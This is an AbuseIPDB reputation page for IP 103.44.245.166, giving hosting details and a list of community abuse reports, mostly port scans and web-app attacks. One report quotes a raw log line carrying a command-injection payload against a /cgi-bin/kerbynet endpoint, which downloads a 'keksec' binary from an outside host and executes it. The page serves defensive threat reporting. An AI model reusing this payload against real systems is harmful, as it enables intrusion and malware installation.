AbuseIPDB » 103.44.245.166

103.44.245.166 was found in our database!

This IP was reported 803 times. Confidence of Abuse is 100%: ?

100%

ISP	Shenzhen Qianhai bird cloud computing Co. Ltd.
Usage Type	Data Center/Web Hosting/Transit
Domain Name	niaoyun.com
Country	China
City	Shenzhen, Guangdong

IP info including ISP, Usage Type, and Location provided by IP2Location. Updated monthly.

Report 103.44.245.166

Whois 103.44.245.166

IP Abuse Reports for 103.44.245.166:

This IP address has been reported a total of 803 times from 78 distinct sources. 103.44.245.166 was first reported on November 24th 2020, and the most recent report was 6 days ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	Date	Comment	Categories
Ross Wheatley	19 Jan 2021	POST /cgi-bin/ViewLog.asp HTTP/1.1 404 488 - B4ckdoor-owned-you	Brute-Force Web App Attack
Ross Wheatley	19 Jan 2021	POST /cgi-bin/ViewLog.asp HTTP/1.1 404 488 - B4ckdoor-owned-you	Brute-Force Web App Attack
Anonymous	10 Jan 2021	$f2bV_matches	Hacking Bad Web Bot Web App Attack
StatsMe	06 Jan 2021	ET CINS Active Threat Intelligence Poor Reputation IP group 97	Port Scan Hacking Spoofing Brute-Force
Joe-Mark	06 Jan 2021	Found on Github Combined on 3 lists / proto=6 . srcport=63697 . dstport=80 HTTP . (183 ... show moreFound on Github Combined on 3 lists / proto=6 . srcport=63697 . dstport=80 HTTP . (1834) show less	Hacking Brute-Force
GAS	06 Jan 2021		Port Scan Hacking
Anonymous	06 Jan 2021	103.44.245.166 - - [06/Jan/2021:03:06:56 +0100] "GET /cgi-bin/kerbynet?Action=x509view&Section=NoAut ... show more103.44.245.166 - - [06/Jan/2021:03:06:56 +0100] "GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%22wget%20http://198.144.190.5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http://198.144.190.5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;%20chmod%20777%20/tmp/.keksec.x86;%20/tmp/.keksec.x86%22%0a' HTTP/1.1" 404 438 "-" "python-requests/2.3.0 CPython/2.7.18 Windows/10" show less	Web App Attack
IrisFlower	06 Jan 2021	Unauthorized connection attempt detected from IP address 103.44.245.166 to port 23 [T]	Port Scan
ChillScanner	06 Jan 2021	<WWW> TCP (SYN) 103.44.245.166:59089 -> port 80, len 40	Port Scan
ChillScanner	05 Jan 2021	<WWW> TCP (SYN) 103.44.245.166:63697 -> port 80, len 40	Port Scan
IrisFlower	05 Jan 2021	Unauthorized connection attempt detected from IP address 103.44.245.166 to port 23 [T]	Port Scan
Anonymous	05 Jan 2021	Port scan (80) 2021-01-05T22:20:15+01:00	Port Scan
ChillScanner	05 Jan 2021	<TELNET> TCP (SYN) 103.44.245.166:59345 -> port 23, len 44	Port Scan
ChillScanner	05 Jan 2021	<WWW> TCP (SYN) 103.44.245.166:45015 -> port 80, len 44	Port Scan
Joe-Mark	05 Jan 2021	Found on Github Combined on 3 lists / proto=6 . srcport=41175 . dstport=80 HTTP . (334 ... show moreFound on Github Combined on 3 lists / proto=6 . srcport=41175 . dstport=80 HTTP . (334) show less	Hacking Brute-Force

Is this your IP? You may request to takedown any associated reports. We will attempt to verify your ownership. Request Takedown 🚩